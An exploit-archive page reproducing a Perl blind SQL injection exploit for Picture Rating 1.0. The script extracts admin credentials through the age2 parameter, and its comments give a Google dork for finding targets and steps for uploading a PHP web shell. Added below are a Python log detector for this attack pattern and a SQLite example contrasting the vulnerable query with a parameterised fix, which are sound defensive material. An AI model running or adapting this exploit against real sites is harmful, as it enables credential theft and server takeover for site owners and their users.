Picture Rating 1.0 - Blind SQL Injection Exploit

Published: 01 Jul 2014 00:00:00. Reported by: RootType. Source: seebug (www.seebug.org)


Code

#!/usr/bin/perl

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

# -Info/Instructions-
# After running this Perl script, you will have the admin details, therefore you will be able to log in to the admin area at http://site.com/control/
# ok once you have logged in as admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now
# register as a normal user or back up the database and get an existing user's and log in to the main site and navigate to upload image/photo and choose your shell and click upload
# the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and that's your shell ;)


# Vendor Not Notified
# Discovered By: t0pP8uZz
# Discovered On: 6 April 2008
# greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!

# inurl:"index.php?cmd=" Latest Pictures hot 

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

use strict;
use LWP::Simple;

print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n";
print "-  Discovered && Coded By: t0pP8uZz                                -\n";
print "-                                  Discovered On: 6 April 2008     -\n";
print "-                                                                  -\n";
print "-   This exploit will perform an automated BLIND SQL attack on ..  -\n";
print "-   .. the target host which is running the script.                -\n";
print "--------------------------------------------------------------------\n";

print "\nEnter URL (ie: http://site.com/): ";
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print "Injecting.. Please Wait this could take several minutes..\n\n";
	my $details = blind($url);
	print "Exploit Success! Admin Details: ".$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*");
		
		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1");
	my $false   = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2");
	
	if($true =~ /Previous/ && $false !~ /Previous/) {
		print "\nTarget Site Vulnerable!\n\n";
		return 1;
	} else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; }
}

# milw0rm.com [2008-04-05]
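The script above reveals itself in web server logs by a fixed request shape: a 1=1/1=2 truth pair sent to the integer parameter age2, then a long run of requests that differ only in the ascii(substring(...)) position and character value. The following detection logic is an added example written for this page; it is not part of the original exploit or of the Picture Rating application. It assumes an Apache combined-format access log and uses a few constructed log lines (the request paths mirror the ones the Perl script builds; the IPs, timestamps, sizes and user agents are made up). It parses each request, decodes the query string, flags non-numeric values in the parameters the application treats as integers, and groups the findings per client IP.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (not real traffic). The first
# four reproduce the request shape of the Perl script above: a 1=1/1=2 truth pair,
# then character-by-character ascii(substring(...)) comparisons carried in age2.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Apr/2008:10:00:01 +0000] "GET /index.php?cmd=11&listpics=Y&age1=13&age2=99%20and%201=1 HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.7 - - [05/Apr/2008:10:00:01 +0000] "GET /index.php?cmd=11&listpics=Y&age1=13&age2=99%20and%201=2 HTTP/1.1" 200 1830 "-" "libwww-perl/5.805"
203.0.113.7 - - [05/Apr/2008:10:00:02 +0000] "GET /index.php?cmd=11&listpics=Y&age1=13&age2=99%20and%20ascii(substring((SELECT%20CONCAT(username,0x3a,password,0x5E)%20FROM%20admin),1,1))=48/* HTTP/1.1" 200 1830 "-" "libwww-perl/5.805"
203.0.113.7 - - [05/Apr/2008:10:00:02 +0000] "GET /index.php?cmd=11&listpics=Y&age1=13&age2=99%20and%20ascii(substring((SELECT%20CONCAT(username,0x3a,password,0x5E)%20FROM%20admin),1,1))=97/* HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.22 - - [05/Apr/2008:10:00:05 +0000] "GET /index.php?cmd=11&listpics=Y&age1=18&age2=30 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.22 - - [05/Apr/2008:10:00:09 +0000] "GET /index.php?cmd=11&listpics=Y&age1=18&age2=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) (?P<bytes>\d+)'
)

# Parameters the application treats as integers (assumed from the URLs above);
# anything that is not a plain number in them is already suspicious.
NUMERIC_PARAMS = {"age1", "age2", "cmd"}

# Markers of boolean-based blind probing, as used by the script above.
BLIND_MARKERS = [
    ("bool-pair", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("char-extract", re.compile(r"ascii\s*\(\s*substring\s*\(", re.I)),
    ("comment-tail", re.compile(r"/\*\s*$")),
]


def parse_line(line):
    """Parse one access-log line into a dict with decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values, so "99%20and%201=1" becomes "99 and 1=1"
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return (parameter, label) hits for one parsed request."""
    hits = []
    for name, values in rec["params"].items():
        for v in values:
            if name in NUMERIC_PARAMS and not v.strip().isdigit():
                hits.append((name, "non-numeric"))
            for label, rx in BLIND_MARKERS:
                if rx.search(v):
                    hits.append((name, label))
    return hits


def analyse(log_text):
    """Group findings per client IP and give each client a verdict."""
    per_ip = defaultdict(lambda: {"requests": 0, "hits": [], "extract_requests": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        info = per_ip[rec["ip"]]
        info["requests"] += 1
        hits = classify(rec)
        info["hits"].extend(hits)
        if any(label == "char-extract" for _, label in hits):
            info["extract_requests"] += 1

    report = {}
    for ip, info in per_ip.items():
        labels = {label for _, label in info["hits"]}
        if {"bool-pair", "char-extract"} & labels:
            verdict = "blind-sqli-probing"
        elif labels:
            verdict = "malformed-input"
        else:
            verdict = "clean"
        report[ip] = {
            "requests": info["requests"],
            "labels": sorted(labels),
            "extract_requests": info["extract_requests"],
            "verdict": verdict,
        }
    return report


if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG).items():
        print(ip, finding)
```

The per-IP grouping matters more than any single signature: one malformed value (age2=abc) is a typo or a scanner, while a 1=1/1=2 pair followed by many extraction requests from the same client, each differing only in the compared character, is the fingerprint of an automated blind extraction and is worth an alert on its own even if the marker regexes are later evaded.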
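The root cause the script exploits is that the age1/age2 filter values are pasted into the SQL text, so the truth of an appended predicate changes whether result rows (and the "Previous" pagination marker the script keys on) appear. The following is an added example, not code from the Picture Rating application (whose source is not shown on this page) nor from the exploit author: it uses an in-memory SQLite table with constructed rows as a stand-in for the real database, shows the weak concatenation pattern that the exploit's behaviour implies, and beside it the hardened version that validates the bounds as integers and binds them as query parameters. The table and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's picture data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (id INTEGER PRIMARY KEY, title TEXT, age INTEGER)")
    db.executemany(
        "INSERT INTO pictures (title, age) VALUES (?, ?)",
        [("sunset", 20), ("cat", 35), ("beach", 50)],
    )
    return db


def vulnerable_list(db, age1, age2):
    """Weak pattern implied by the exploit: query-string values go straight into
    the SQL text, so age2 can carry extra predicates that decide the row count."""
    sql = ("SELECT title FROM pictures WHERE age >= " + age1
           + " AND age <= " + age2 + " ORDER BY id")
    return [row[0] for row in db.execute(sql)]


def hardened_list(db, age1, age2):
    """Hardened version: validate the bounds as integers in the range the UI
    offers, then bind them as parameters so the SQL text is constant."""
    try:
        lo, hi = int(age1), int(age2)
    except ValueError:
        raise ValueError("age bounds must be integers")
    if not (0 <= lo <= hi <= 130):
        raise ValueError("age bounds out of range")
    sql = "SELECT title FROM pictures WHERE age BETWEEN ? AND ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (lo, hi))]


def hardened_rejects(db, age2, age1="13"):
    """True if the hardened filter refuses the given age2 value."""
    try:
        hardened_list(db, age1, age2)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # In the vulnerable version an appended predicate flips the result set on and
    # off, which is exactly the yes/no oracle a blind injection needs.
    print("vulnerable, plain:     ", vulnerable_list(db, "13", "99"))
    print("vulnerable, 'and 1=1': ", vulnerable_list(db, "13", "99 and 1=1"))
    print("vulnerable, 'and 1=2': ", vulnerable_list(db, "13", "99 and 1=2"))
    # The hardened version treats the same input as a malformed integer.
    print("hardened, plain:       ", hardened_list(db, "13", "99"))
    print("hardened rejects 'and 1=1':", hardened_rejects(db, "99 and 1=1"))
```

Integer validation alone would have closed this particular hole, but parameter binding is the fix that survives the next code change: with the SQL text constant and every value bound, a crafted age2 can at most produce a type error, never a different predicate, and a MySQL-specific function such as ascii(substring(...)) in the value has nothing to act on.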
